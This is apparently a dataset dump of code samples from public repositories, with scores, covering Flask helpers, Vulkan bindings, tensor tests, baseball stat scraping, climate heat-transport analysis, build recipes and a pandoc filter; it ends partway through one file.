max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
pf_flask/pff_utils.py | problemfighter/pf-flask | 5 | 12766351 | import os.path
import sys
from functools import reduce
from os.path import exists
from werkzeug.utils import ImportStringError
def import_from_string(import_name: str, silent: bool = False):
import_name = import_name.replace(":", ".")
try:
try:
__import__(import_name)
except ImportError:
if "." not in import_name:
raise
else:
return sys.modules[import_name]
module_name, obj_name = import_name.rsplit(".", 1)
module = __import__(module_name, globals(), locals(), [obj_name])
try:
return getattr(module, obj_name)
except AttributeError as e:
raise ImportError(e)
except ImportError as e:
if not silent:
raise ImportStringError(import_name, e).with_traceback(sys.exc_info()[2])
return None
def is_url_register(flask_app, url):
for url_rule in flask_app.url_map.iter_rules():
if url_rule.rule == url:
return True
return False
def concat_path(first, last, *more_path):
path = os.path.join(first, last)
if len(more_path) > 0:
path = os.path.join(path, reduce(os.path.join, more_path))
return path
def is_exists_path(path):
return exists(path)
| 2.21875 | 2 |
src/connections/_mqqt.py | Freonius/tranquillity | 0 | 12766352 | from .__interface import IConnection
class Mqqt(IConnection):
pass
| 1.171875 | 1 |
src/vulkan.template.py | realitix/pyVulkan | 0 | 12766353 | from cffi import *
from pkg_resources import *
from collections import Iterable
from weakref import *
import sys
ffi = FFI()
_weakkey_dict = WeakKeyDictionary()
def _castToPtr2(x, _type):
if isinstance(x, ffi.CData):
if _type.item==ffi.typeof(x):
return ffi.addressof(x)
return x
if isinstance(x, Iterable):
if _type.item.kind=='pointer':
ptrs = [_castToPtr(i, _type.item) for i in x]
ret = ffi.new(_type.item.cname+'[]', ptrs)
_weakkey_dict[ret] = tuple(ptrs)
return ret
else:
return ffi.new(_type.item.cname+'[]', x)
return ffi.cast(_type, x)
def _castToPtr3(x, _type):
if isinstance(x, str):
x = x.encode('ascii')
return _castToPtr2(x, _type)
if sys.version_info<(3, 0):
ffi.cdef(resource_string(__name__, "_vulkan.h"))
_castToPtr = _castToPtr2
else:
ffi.cdef(resource_string(__name__, "_vulkan.h").decode())
_castToPtr = _castToPtr3
if sys.platform=='win32':
_lib = ffi.dlopen('vulkan-1.dll')
else:
_lib = ffi.dlopen('libvulkan.so')
PFN_vkDebugReportCallbackEXT = ffi.callback('VkBool32(VkFlags, VkDebugReportObjectTypeEXT, uint64_t, size_t, int32_t, const char *, const char *, void *)')
PFN_vkAllocationFunction = ffi.callback('void*(void*, size_t, size_t, VkSystemAllocationScope)')
PFN_vkReallocationFunction = ffi.callback('void*(void*, void*, size_t, size_t, VkSystemAllocationScope)')
PFN_vkFreeFunction = ffi.callback('void(void*, void*)')
PFN_vkInternalAllocationNotification = ffi.callback('void(void*, size_t, VkInternalAllocationType, VkSystemAllocationScope)')
PFN_vkInternalFreeNotification = PFN_vkInternalAllocationNotification
{% for i in enums %}
class {{i}}:
{% for k, v in enums[i].relements.items() %}{{k}} = {{v}}
{% endfor %}
{% for k, v in enums[i].relements.items() %}
{{k}} = {{i}}.{{k}}
{% endfor %}
{% endfor %}
def _newStruct(ctype, **kwargs):
_type = ffi.typeof(ctype)
kwargs = {k:kwargs[k] for k in kwargs if kwargs[k]}
ptrs = {k:_castToPtr(kwargs[k], dict(_type.fields)[k].type) for k in kwargs if dict(_type.fields)[k].type.kind=='pointer'}
ret = ffi.new(_type.cname+'*', dict(kwargs, **ptrs))[0]
_weakkey_dict[ret] = tuple(ptrs.values())
return ret
{% for i, fields in structs.items() %}
def {{i}}({% for j, _ in fields %}{{j}} = {% if j in field_defaults %}{{field_defaults[j](i)}}{% else %}None{% endif %}, {% endfor %}):
return _newStruct('{{i}}', {% for j, _ in fields %}{{j}} = {{j}}, {% endfor %})
{% endfor %}
class VkException(Exception):
pass
class VkError(Exception):
pass
{% for _, i ,j in exceptions %}
class {{i}}({{j}}):
pass
{% endfor %}
def _raiseException(ret):
exceptions = {
{% for i, j, _ in exceptions %}
{{i}}:{{j}},
{% endfor %}
}
if ret!=0:
raise exceptions[ret]
def _callApi(fn, *args):
def _(x, _type):
if x is None:
return ffi.NULL
if _type.kind=='pointer':
return _castToPtr(x, _type)
return x
return fn(*(_(i, j) for i, j in zip(args, ffi.typeof(fn).args)))
{% for i, (exception_handler, result, result_length, args, inner_args, new_vars) in funcs.items() %}
if hasattr(_lib, '{{i}}'):
def {{i}}({% for j, k in args %}{{j}}, {% endfor %}):
{% for i in new_vars %}
{{i}} = ffi.new('{{new_vars[i]}}')
{% endfor %}
{% if result_length and result_length!=1 %}
ret = _callApi(_lib.{{i}}, {% for j in inner_args[:-1] %}{{j}}, {% endfor %}ffi.NULL)
{% if exception_handler %}
_raiseException(ret)
{% endif %}
{{result[0]}} = ffi.new('{{result[1].item.cname}}[]', {{result_length}}[0])
{% endif %}
ret = _callApi(_lib.{{i}}, {% for j in inner_args %}{{j}}, {% endfor %})
{% if exception_handler %}
_raiseException(ret)
{% endif %}
{% if result %}
return {{result[0]}}{% if result_length==1 %}[0]{% endif %}{% endif %}
{% endfor %}
def vkGetInstanceProcAddr(instance, pName, ):
ret = _callApi(_lib.vkGetInstanceProcAddr, instance, pName, )
return ret
def vkGetDeviceProcAddr(device, pName, ):
ret = _callApi(_lib.vkGetDeviceProcAddr, device, pName, )
return ret
VK_KHR_SAMPLER_MIRROR_CLAMP_TO_EDGE_EXTENSION_NAME = "VK_KHR_sampler_mirror_clamp_to_edge"
VK_KHR_SURFACE_EXTENSION_NAME = "VK_KHR_surface"
VK_KHR_sampler_mirror_clamp_to_edge = 1
VK_KHR_SWAPCHAIN_EXTENSION_NAME = "VK_KHR_swapchain"
def VK_MAKE_VERSION(major, minor, patch):
return (((major) << 22) | ((minor) << 12) | (patch))
VULKAN_H_ = 1
VK_ATTACHMENT_UNUSED = -1
def VK_VERSION_PATCH(version):
return version&0xfff
VK_WHOLE_SIZE = -1
VK_UUID_SIZE = 16
VK_REMAINING_MIP_LEVELS = -1
VK_MAX_MEMORY_TYPES = 32
VK_FALSE = 0
VK_KHR_SURFACE_SPEC_VERSION = 25
VK_KHR_display_swapchain = 1
VK_TRUE = 1
VK_NV_GLSL_SHADER_SPEC_VERSION = 1
VK_NV_GLSL_SHADER_EXTENSION_NAME = "VK_NV_glsl_shader"
VK_EXT_debug_report = 1
VK_EXT_DEBUG_REPORT_SPEC_VERSION = 2
VK_KHR_display = 1
VK_STRUCTURE_TYPE_DEBUG_REPORT_CREATE_INFO_EXT = VK_STRUCTURE_TYPE_DEBUG_REPORT_CALLBACK_CREATE_INFO_EXT
VK_KHR_surface = 1
VK_KHR_SAMPLER_MIRROR_CLAMP_TO_EDGE_SPEC_VERSION = 1
VK_API_VERSION = VK_MAKE_VERSION(1, 0, 5)
VK_MAX_EXTENSION_NAME_SIZE = 256
def VK_VERSION_MINOR(version):
return (version>>12)&0x3ff
VK_QUEUE_FAMILY_IGNORED = -1
def VK_VERSION_MAJOR(version):
return version>>22
VK_KHR_DISPLAY_SWAPCHAIN_SPEC_VERSION = 9
VK_LOD_CLAMP_NONE = 1000.0
VK_KHR_DISPLAY_SPEC_VERSION = 21
VK_NULL_HANDLE = 0
VK_MAX_PHYSICAL_DEVICE_NAME_SIZE = 256
VK_REMAINING_ARRAY_LAYERS = -1
VK_KHR_SWAPCHAIN_SPEC_VERSION = 67
VK_VERSION_1_0 = 1
VK_MAX_DESCRIPTION_SIZE = 256
VK_KHR_DISPLAY_SWAPCHAIN_EXTENSION_NAME = "VK_KHR_display_swapchain"
VK_KHR_swapchain = 1
VK_EXT_DEBUG_REPORT_EXTENSION_NAME = "VK_EXT_debug_report"
VK_MAX_MEMORY_HEAPS = 16
VK_SUBPASS_EXTERNAL = -1
VK_NV_glsl_shader = 1
VK_KHR_DISPLAY_EXTENSION_NAME = "VK_KHR_display"
VK_KHR_xlib_surface = 1
VK_KHR_XLIB_SURFACE_SPEC_VERSION = 6
VK_KHR_XLIB_SURFACE_EXTENSION_NAME = "VK_KHR_xlib_surface"
VK_KHR_xcb_surface = 1
VK_KHR_XCB_SURFACE_SPEC_VERSION = 6
VK_KHR_XCB_SURFACE_EXTENSION_NAME = "VK_KHR_xcb_surface"
VK_KHR_wayland_surface = 1
VK_KHR_WAYLAND_SURFACE_SPEC_VERSION = 5
VK_KHR_WAYLAND_SURFACE_EXTENSION_NAME = "VK_KHR_wayland_surface"
VK_KHR_mir_surface = 1
VK_KHR_MIR_SURFACE_SPEC_VERSION = 4
VK_KHR_MIR_SURFACE_EXTENSION_NAME = "VK_KHR_mir_surface"
VK_KHR_android_surface = 1
VK_KHR_ANDROID_SURFACE_SPEC_VERSION = 6
VK_KHR_ANDROID_SURFACE_EXTENSION_NAME = "VK_KHR_android_surface"
VK_KHR_win32_surface = 1
VK_KHR_WIN32_SURFACE_SPEC_VERSION = 5
VK_KHR_WIN32_SURFACE_EXTENSION_NAME = "VK_KHR_win32_surface" | 2.015625 | 2 |
python/oneflow/test/modules/test_add.py | Zhangchangh/oneflow | 0 | 12766354 | <filename>python/oneflow/test/modules/test_add.py
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
import numpy as np
from test_util import GenArgList
import oneflow as flow
import oneflow.unittest
def _test_add_forward(test_case, shape, device):
x = flow.Tensor(np.random.randn(*shape), device=flow.device(device))
y = flow.Tensor(np.random.randn(*shape), device=flow.device(device))
of_out = flow.add(x, y)
np_out = np.add(x.numpy(), y.numpy())
test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 0.0001, 0.0001))
x = 5
y = flow.Tensor(np.random.randn(*shape), device=flow.device(device))
of_out = flow.add(x, y)
np_out = np.add(x, y.numpy())
test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 0.0001, 0.0001))
x = flow.Tensor(np.random.randn(*shape), device=flow.device(device))
y = 5
of_out = flow.add(x, y)
np_out = np.add(x.numpy(), y)
test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 0.0001, 0.0001))
x = flow.Tensor(np.random.randn(*shape), device=flow.device(device))
y = flow.Tensor(np.array([5.0]), device=flow.device(device))
of_out = flow.add(x, y)
np_out = np.add(x.numpy(), y.numpy())
test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 0.0001, 0.0001))
x = flow.Tensor(np.random.randn(1, 1), device=flow.device(device))
y = flow.Tensor(np.random.randn(*shape), device=flow.device(device))
of_out = flow.add(x, y)
np_out = np.add(x.numpy(), y.numpy())
test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 0.0001, 0.0001))
def _test_add_backward(test_case, shape, device):
x = 5
y = flow.Tensor(
np.random.randn(*shape), requires_grad=True, device=flow.device(device)
)
of_out = flow.add(x, y).sum()
of_out.backward()
test_case.assertTrue(
np.allclose(y.grad.numpy(), np.ones(shape=shape), 0.0001, 0.0001)
)
def _test_inplace_add(test_case, shape, device):
np_x = np.random.randn(*shape)
of_x = flow.Tensor(
np_x, dtype=flow.float32, device=flow.device(device), requires_grad=True
)
of_x_inplace = of_x + 1
id_old = id(of_x_inplace)
of_x_inplace.add_(5)
test_case.assertEqual(id_old, id(of_x_inplace))
np_out = np_x + 1 + 5
test_case.assertTrue(np.allclose(of_x_inplace.numpy(), np_out, 1e-05, 1e-05))
of_x_inplace = of_x_inplace.sum()
of_x_inplace.backward()
test_case.assertTrue(np.allclose(of_x.grad.numpy(), np.ones(shape), 1e-05, 1e-05))
of_x = flow.Tensor(
np_x, dtype=flow.float32, device=flow.device(device), requires_grad=True
)
of_y = flow.Tensor(
np.random.randn(*shape), device=flow.device(device), requires_grad=False
)
of_x_inplace = of_x + 1
id_old = id(of_x_inplace)
of_x_inplace.add_(of_y)
test_case.assertEqual(id_old, id(of_x_inplace))
np_out = np_x + 1 + of_y.numpy()
test_case.assertTrue(np.allclose(of_x_inplace.numpy(), np_out, 1e-05, 1e-05))
of_x_inplace = of_x_inplace.sum()
of_x_inplace.backward()
test_case.assertTrue(np.allclose(of_x.grad.numpy(), np.ones(shape), 1e-05, 1e-05))
of_x = flow.Tensor(
np_x, dtype=flow.float32, device=flow.device(device), requires_grad=True
)
of_y = flow.Tensor(
np.random.randn(*shape), device=flow.device(device), requires_grad=False
)
of_x_inplace = of_x + 1
id_old = id(of_x_inplace)
of_x_inplace += of_y
test_case.assertEqual(id_old, id(of_x_inplace))
np_out = np_x + 1 + of_y.numpy()
test_case.assertTrue(np.allclose(of_x_inplace.numpy(), np_out, 1e-05, 1e-05))
of_x_inplace = of_x_inplace.sum()
of_x_inplace.backward()
test_case.assertTrue(np.allclose(of_x.grad.numpy(), np.ones(shape), 1e-05, 1e-05))
of_x = flow.Tensor(
np_x, dtype=flow.float32, device=flow.device(device), requires_grad=True
)
of_y = flow.Tensor(np.array([5.0]), device=flow.device(device), requires_grad=False)
of_x_inplace = of_x + 1
id_old = id(of_x_inplace)
of_x_inplace.add_(of_y)
test_case.assertEqual(id_old, id(of_x_inplace))
np_out = np_x + 6
test_case.assertTrue(np.allclose(of_x_inplace.numpy(), np_out, 1e-05, 1e-05))
of_x_inplace = of_x_inplace.sum()
of_x_inplace.backward()
test_case.assertTrue(np.allclose(of_x.grad.numpy(), np.ones(shape), 1e-05, 1e-05))
of_x = flow.Tensor(
np_x, dtype=flow.float32, device=flow.device(device), requires_grad=True
)
np_y = np.random.randn(*shape[:-1], 1)
of_y = flow.Tensor(np_y, device=flow.device(device), requires_grad=False)
of_x_inplace = of_x + 1
id_old = id(of_x_inplace)
of_x_inplace.add_(of_y)
test_case.assertEqual(id_old, id(of_x_inplace))
np_out = np_x + 1 + np_y
test_case.assertTrue(np.allclose(of_x_inplace.numpy(), np_out, 1e-05, 1e-05))
of_x_inplace = of_x_inplace.sum()
of_x_inplace.backward()
test_case.assertTrue(np.allclose(of_x.grad.numpy(), np.ones(shape), 1e-05, 1e-05))
@flow.unittest.skip_unless_1n1d()
class TestAddModule(flow.unittest.TestCase):
def test_add(test_case):
arg_dict = OrderedDict()
arg_dict["test_fun"] = [
_test_add_forward,
_test_add_backward,
_test_inplace_add,
]
arg_dict["shape"] = [(2, 3), (2, 3, 4), (2, 3, 4, 5)]
arg_dict["device"] = ["cpu", "cuda"]
for arg in GenArgList(arg_dict):
arg[0](test_case, *arg[1:])
if __name__ == "__main__":
unittest.main()
| 2.203125 | 2 |
build_logs.py | mayscopeland/open_projections | 0 | 12766355 | <filename>build_logs.py
import pandas as pd
import requests
import datetime
import calendar
from pathlib import Path
def main():
build_monthly_gamelogs("2021", "10")
combine_gamelogs()
#build_yearly_gamelogs("2014")
#combine_player_logs(670623)
def combine_gamelogs():
filepath = Path(__file__).parent
all_batting = (filepath / "stats" / "batting").glob("*.csv")
li = []
for filename in all_batting:
df = pd.read_csv(filename, index_col=None, header=0)
li.append(df)
frame = pd.concat(li, axis=0, ignore_index=True)
frame.to_csv(filepath / "stats" / "batting.csv", index=False)
all_pitching = (filepath / "stats" / "pitching").glob("*.csv")
li = []
for filename in all_pitching:
df = pd.read_csv(filename, index_col=None, header=0)
li.append(df)
frame = pd.concat(li, axis=0, ignore_index=True)
frame["QS"] = frame.apply(quality_start, axis=1)
frame.to_csv(filepath / "stats" / "pitching.csv", index=False)
def quality_start(s):
if s["GS"] > 0:
if s["IP"] >= 6:
if s["ER"] <= 3:
return 1
return 0
def build_yearly_gamelogs(year):
bb_months = ["01","02","03","04","05","06","07","08","09","10","11","12"]
for month in bb_months:
build_monthly_gamelogs(year, month)
def build_monthly_gamelogs(year, month):
# Get a list of days in the month
num_days = calendar.monthrange(int(year), int(month))[1]
game_dates = [datetime.date(int(year), int(month), day) for day in range(1, num_days + 1)]
for game_date in game_dates:
build_daily_gamelogs(game_date.strftime("%Y-%m-%d"))
def build_daily_gamelogs(date_string):
df_batting = pd.DataFrame()
df_pitching = pd.DataFrame()
games = []
filename = date_string + ".csv"
batting_file = Path(__file__).parent / "stats" / "batting" / filename
pitching_file = Path(__file__).parent / "stats" / "pitching" / filename
if not batting_file.is_file():
print(date_string)
# Get a list of game ids for games on this date
games = get_games(date_string)
# For each game, get the stats for every player
for game in games:
game_batting, game_pitching = get_game_logs(game)
# Convert our list to a DataFrame
df_game_batting = pd.DataFrame(game_batting)
df_game_pitching = pd.DataFrame(game_pitching)
# Append daily stats to our running total
df_batting = df_batting.append(df_game_batting)
df_pitching = df_pitching.append(df_game_pitching)
#print(df_game_batting.head())
#print(df_game_pitching.head())
if games:
df_batting.to_csv(batting_file, index=False)
df_pitching.to_csv(pitching_file, index=False)
def get_games(date_string):
games = []
sportIds = [1, 11, 12, 13, 14, 16, 17]
for sportId in sportIds:
url = "https://statsapi.mlb.com/api/v1/schedule/?sportId={}&date={}".format(
sportId,
date_string
)
schedule = requests.get(url).json()
for date in schedule["dates"]:
for game_data in date["games"]:
# Skip games that are not finished ("F")
# If a game was delayed, it will show up again on a later calendar date
if game_data["status"]["codedGameState"] == "F":
game = {}
game["date"] = date_string
game["game_id"] = game_data["gamePk"]
game["game_type"] = game_data["gameType"]
game["venue_id"] = game_data["venue"]["id"]
game["league_id"] = sportId
games.append(game)
return games
def get_game_logs(game):
batting_logs = []
pitching_logs = []
url = "https://statsapi.mlb.com/api/v1/game/{}/boxscore".format(game["game_id"])
game_info = requests.get(url).json()
for team in game_info["teams"].values():
for player in team["players"].values():
if player["stats"]["batting"]:
batting_log = {}
batting_log["date"] = game["date"]
batting_log["game_id"] = game["game_id"]
batting_log["game_type"] = game["game_type"]
batting_log["venue_id"] = game["venue_id"]
batting_log["league_id"] = game["league_id"]
batting_log["player_id"] = player["person"]["id"]
batting_log["batting_order"] = player.get("battingOrder", "")
batting_log["AB"] = player["stats"]["batting"]["atBats"]
batting_log["R"] = player["stats"]["batting"]["runs"]
batting_log["H"] = player["stats"]["batting"]["hits"]
batting_log["2B"] = player["stats"]["batting"]["doubles"]
batting_log["3B"] = player["stats"]["batting"]["triples"]
batting_log["HR"] = player["stats"]["batting"]["homeRuns"]
batting_log["RBI"] = player["stats"]["batting"]["rbi"]
batting_log["SB"] = player["stats"]["batting"]["stolenBases"]
batting_log["CS"] = player["stats"]["batting"]["caughtStealing"]
batting_log["BB"] = player["stats"]["batting"]["baseOnBalls"]
batting_log["SO"] = player["stats"]["batting"]["strikeOuts"]
batting_log["IBB"] = player["stats"]["batting"]["intentionalWalks"]
batting_log["HBP"] = player["stats"]["batting"]["hitByPitch"]
batting_log["SH"] = player["stats"]["batting"]["sacBunts"]
batting_log["SF"] = player["stats"]["batting"]["sacFlies"]
batting_log["GIDP"] = player["stats"]["batting"]["groundIntoDoublePlay"]
batting_logs.append(batting_log)
if player["stats"]["pitching"]:
pitching_log = {}
pitching_log["date"] = game["date"]
pitching_log["game_id"] = game["game_id"]
pitching_log["game_type"] = game["game_type"]
pitching_log["venue_id"] = game["venue_id"]
pitching_log["league_id"] = game["league_id"]
pitching_log["player_id"] = player["person"]["id"]
pitching_log["W"] = player["stats"]["pitching"].get("wins", "")
pitching_log["L"] = player["stats"]["pitching"].get("losses", "")
pitching_log["G"] = player["stats"]["pitching"].get("gamesPlayed", "")
pitching_log["GS"] = player["stats"]["pitching"].get("gamesStarted", "")
pitching_log["CG"] = player["stats"]["pitching"].get("completeGames", "")
pitching_log["SHO"] = player["stats"]["pitching"].get("shutouts", "")
pitching_log["SV"] = player["stats"]["pitching"].get("saves", "")
pitching_log["HLD"] = player["stats"]["pitching"].get("holds", "")
pitching_log["BFP"] = player["stats"]["pitching"].get("battersFaced", "")
pitching_log["IP"] = player["stats"]["pitching"].get("inningsPitched", "")
pitching_log["H"] = player["stats"]["pitching"].get("hits", "")
pitching_log["ER"] = player["stats"]["pitching"].get("earnedRuns", "")
pitching_log["R"] = player["stats"]["pitching"].get("runs", "")
pitching_log["HR"] = player["stats"]["pitching"].get("homeRuns", "")
pitching_log["SO"] = player["stats"]["pitching"].get("strikeOuts", "")
pitching_log["BB"] = player["stats"]["pitching"].get("baseOnBalls", "")
pitching_log["IBB"] = player["stats"]["pitching"].get("intentionalWalks", "")
pitching_log["HBP"] = player["stats"]["pitching"].get("hitByPitch", "")
pitching_log["WP"] = player["stats"]["pitching"].get("wildPitches", "")
pitching_log["BK"] = player["stats"]["pitching"].get("balks", "")
pitching_logs.append(pitching_log)
return batting_logs, pitching_logs
if __name__ == "__main__":
main() | 2.9375 | 3 |
compute_ht.py | ddocquier/OSeaIce | 0 | 12766356 | <reponame>ddocquier/OSeaIce
#!/usr/bin/env python
'''
GOAL
Compute meridional total heat transport
PROGRAMMER
<NAME>
LAST UPDATE
19/11/2020
'''
# Options
exp = 'D023'
save_var = True
# Standard libraries
from netCDF4 import Dataset
import numpy as np
from scipy import integrate
import matplotlib.pyplot as plt
# Working directories
dir_input = '/nobackup/rossby24/proj/rossby/joint_exp/oseaice/post-proc/' + str(exp) + '/'
dir_output = dir_input
# Function to compute total heat transport in PW - adapted from <NAME>, http://www.atmos.albany.edu/facstaff/brose/classes/ATM623_Spring2015/Notes/Lectures/Lecture13%20--%20Heat%20transport.html
def inferred_heat_transport(energy_in,lat_deg):
lat_rad = np.deg2rad(lat_deg)
radius = 6.371e6 # Earth radius (m)
ht = 2. * np.math.pi * radius**2 * integrate.cumtrapz(np.cos(lat_rad)*energy_in,x=lat_rad,initial=0.)
ht = ht / 1.e15 # Convert from W to PW
return ht
# Load top net solar (shortwave) radiation (J/m^2, positive downwards)
filename = dir_input + 'tsr_'+str(exp)+'_2130.nc'
fh = Dataset(filename, mode='r')
tsr = fh.variables['var178'][:]
lat = fh.variables['lat'][:]
fh.close()
nm,ny,nx = tsr.shape
# Load top net thermal (longwave) radiation (J/m^2, positive downwards)
filename = dir_input + 'ttr_'+str(exp)+'_2130.nc'
fh = Dataset(filename, mode='r')
ttr = fh.variables['var179'][:]
fh.close()
# Load restoring flux (W/m^2)
if exp != 'D000':
filename = dir_input + 'hfcorr_ifs_'+str(exp)+'_2130-2179.nc'
fh = Dataset(filename, mode='r')
hfcorr = fh.variables['hfcorr'][:]
hfcorr[hfcorr>1.e10] = 0.
hfcorr[hfcorr<-1.e10] = 0.
fh.close()
# Load surface ocean heat flux (W/m^2)
filename = dir_input + 'qtoce_ifs_'+str(exp)+'_2130.nc'
fh = Dataset(filename, mode='r')
ohfl = fh.variables['qt_oce'][:]
ohfl[ohfl>1.e10] = 0.
ohfl[ohfl<-1.e10] = 0.
fh.close()
# Convert radiations from J/m^2 to W/m^2
if exp == 'D000': # Output every 6h
tsr = tsr / (6*3600)
ttr = ttr / (6*3600)
else: # Output every 12h
tsr = tsr / (12*3600)
ttr = ttr / (12*3600)
# Zonal means
tsr_mean = np.nanmean(tsr,axis=2)
ttr_mean = np.nanmean(ttr,axis=2)
ohfl_mean = np.nanmean(ohfl,axis=2)
if exp != 'D000':
hfcorr_mean = np.nanmean(hfcorr,axis=2)
ohfl_mean = ohfl_mean + hfcorr_mean
# Compute top net downward radiation (sum of solar and thermal radiation, if both positive downwards)
Rt = tsr_mean + ttr_mean
# Compute surface net heat flux into the atmosphere
if exp != 'D000':
Fatmin = Rt - (ohfl_mean - hfcorr_mean)
else:
Fatmin = Rt - ohfl_mean
# Compute total, atmospheric and ocean heat transports from South Pole
lat = np.flip(lat)
Rt = np.flip(Rt,1)
Fatmin = np.flip(Fatmin,1)
ohfl_mean = np.flip(ohfl_mean,1)
ht_total = np.zeros((nm,ny))
aht = np.zeros((nm,ny))
oht = np.zeros((nm,ny))
for t in np.arange(nm):
ht_total[t,:] = inferred_heat_transport(Rt[t,:],lat)
aht[t,:] = inferred_heat_transport(Fatmin[t,:],lat)
oht[t,:] = inferred_heat_transport(ohfl_mean[t,:],lat)
# Save variables
if save_var == True:
filename = dir_output + 'ht_' + str(exp) + '.npy'
np.save(filename,[ht_total,aht,oht,lat])
| 2.21875 | 2 |
hardhat/recipes/mingw64/mingw64_openblas.py | stangelandcl/hardhat | 0 | 12766357 | import os
import shutil
from sys import platform
from .base import Mingw64BaseRecipe
from hardhat.urls import Urls
from hardhat.util import patch
class Mingw64OpenBlasRecipe(Mingw64BaseRecipe):
def __init__(self, *args, **kwargs):
super(Mingw64OpenBlasRecipe, self).__init__(*args, **kwargs)
self.sha256 = 'c4f71a60e3f23a7a25693390af3be230' \
'8d374749ae3cb0bcfd8aab33a3c9ac09'
# depends on wine but self.depends = ['wine'] doesn't work
self.name = 'mingw64-openblas'
self.version = 'fd4e68128e56beb3b97f37178edf07bef7ade5f1'
self.url = Urls.github_commit('xianyi', 'OpenBLAS',
self.version)
# self.filename = os.path.join(self.tarball_dir,
# 'openblas-%s.tar.gz' % self.version)
self.libname = 'libopenblas.a'
del self.environment['CPPFLAGS']
del self.environment['CXXFLAGS']
self.environment['CFLAGS'] = '-fomit-frame-pointer' \
' -funroll-loops'
self.environment['FFLAGS'] = '-fomit-frame-pointer' \
' -funroll-loops'
os.environ['GFORTRAN'] = 'x86_64-w64-mingw32-gfortran'
self.compile_args += ['USE_THREAD=1',
'FC=gfortran',
# 'CC=%s' % os.environ['CC'],
'FC=%s' % os.environ['GFORTRAN'],
'BINARY=64',
# 'HOSTCC=%s' % os.environ['CC'],
# 'AS=%s' % os.environ['AS'],
# 'CROSS=1',
# 'LD=%s' % os.environ['LD'],
# 'CROSS_SUFFIX=x86_64-w64-mingw32-'
]
# If needed. See TargetList.txt in OpenBLAS directory for list of targets
if self.is_atom():
self.compile_args += ['TARGET=ATOM']
else:
# hardcoded because it failed to compile when detecting for itself
self.compile_args += ['TARGET=CORE2']
# self.compile_args = ['make',
# 'all',
# 'BLASLIB=%s' % (self.libname),
# 'OPTS="-O3 -fomit-frame-pointer -funroll-loops"'
# ] # not parallel safe
self.install_args += ['PREFIX=%s' % (self.prefix_dir)
]
def is_atom(self):
lines = []
if platform == "linux" or platform == "linux2":
with open('/proc/cpuinfo', 'rt') as f:
lines = f.readlines()
for line in lines:
if line.startswith('model name'):
model = line[len('model_name'):].strip()
model = model[2:]
if 'Intel(R) Celeron(R) CPU N2940' in model:
return True
break
return False
def patch(self):
self.log_dir('patch', self.directory, 'patching getarch')
filename = os.path.join(self.directory, 'Makefile.prebuild')
src = './getarch_2nd'
dst = '%s/../bin/wine64 ./getarch_2nd' % self.prefix_dir
patch(filename, src, dst)
src = './getarch '
dst = '%s/../bin/wine64 ./getarch ' % self.prefix_dir
patch(filename, src, dst)
def configure(self):
pass
# def install(self):
# super(OpenBlasRecipe, self).install()
#
# libs = ['libopenblas.a',
# 'libopenblas.so.0',
# 'libopenblas.so']
#
# for lib in libs:
# src = os.path.join(self.directory, 'lib', lib)
# dest = os.path.join(self.prefix_dir, 'lib', lib)
# shutil.copy2(src, dest)
| 2.03125 | 2 |
examples/theorem.py | fractaledmind/pandocfilters | 1 | 12766358 | #!/usr/bin/env python
"""
Pandoc filter to convert divs with class="theorem" to LaTeX
theorem environments in LaTeX output, and to numbered theorems
in HTML output.
"""
from pandocfilters import toJSONFilter, RawBlock, Div
theoremcount = 0
def latex(x):
return RawBlock('latex',x)
def html(x):
return RawBlock('html', x)
def theorems(key, value, format, meta):
if key == 'Div':
[[ident,classes,kvs], contents] = value
if "theorem" in classes:
if format == "latex":
if ident == "":
label = ""
else:
label = '\\label{' + ident + '}'
return([latex('\\begin{theorem}' + label)] + contents +
[latex('\\end{theorem}')])
elif format == "html" or format == "html5":
global theoremcount
theoremcount = theoremcount + 1
newcontents = [html('<dt>Theorem ' + str(theoremcount) + '</dt>'),
html('<dd>')] + contents + [html('</dd>\n</dl>')]
return Div([ident,classes,kvs], newcontents)
if __name__ == "__main__":
toJSONFilter(theorems)
| 3.203125 | 3 |
template/tests/test_calc_mass.py | ajmaurais/peptide_analyzer | 0 | 12766359 | <filename>template/tests/test_calc_mass.py
import unittest
from collections import Counter
import load_dat
import std_functions
from molecular_formula import calc_mass
class TestCalcMass(unittest.TestCase):
def test_calc_mass(self):
for i, row in load_dat.dat_std.iterrows():
self.assertAlmostEqual(float(row['mass']),
calc_mass(std_functions.calc_formula(row['seq'],
load_dat.atom_counts)))
if __name__ == '__main__':
unittest.main(verbosity=2)
| 2.46875 | 2 |
gan/train.py | TIBHannover/formula_gan | 6 | 12766360 | <reponame>TIBHannover/formula_gan
import sys
import os
import re
import argparse
import logging
import torch
from pytorch_lightning import Trainer
import wap_model
import formula_model
from config import Config
def main():
config = Config()
print(config.to_args())
print(vars(config.to_flat_args()))
model = formula_model.FormulaOCR(config.to_args(), flat_params=config.to_flat_args())
# most basic trainer, uses good defaults
trainer = Trainer()
trainer.fit(model)
if __name__ == "__main__":
sys.exit(main())
| 2.34375 | 2 |
src/satyrus/types/base.py | pedromxavier/Satyrus3 | 1 | 12766361 | <filename>src/satyrus/types/base.py
"""
"""
# Future Imports
from __future__ import annotations
# Local
from ..satlib import Source, Posiform
from ..symbols import T_NOT, T_AND, T_OR, T_XOR, T_IMP, T_IFF, T_RIMP, T_EQ, T_NE, T_LT, T_LE, T_GT, T_GE, T_IDX, T_ADD, T_SUB, T_DIV, T_MUL, T_NEG
class MetaSatType(type):
base_type = None
def __new__(cls, name: str, bases: tuple, namespace: dict):
if cls.base_type is None:
if name == "SatType":
cls.base_type = type(name, bases, namespace)
return cls.base_type
else:
raise NotImplementedError(f"'SatType must be implemented before '{name}'")
else:
if name == "Number":
cls.base_type.Number = type(name, bases, namespace)
return cls.base_type.Number
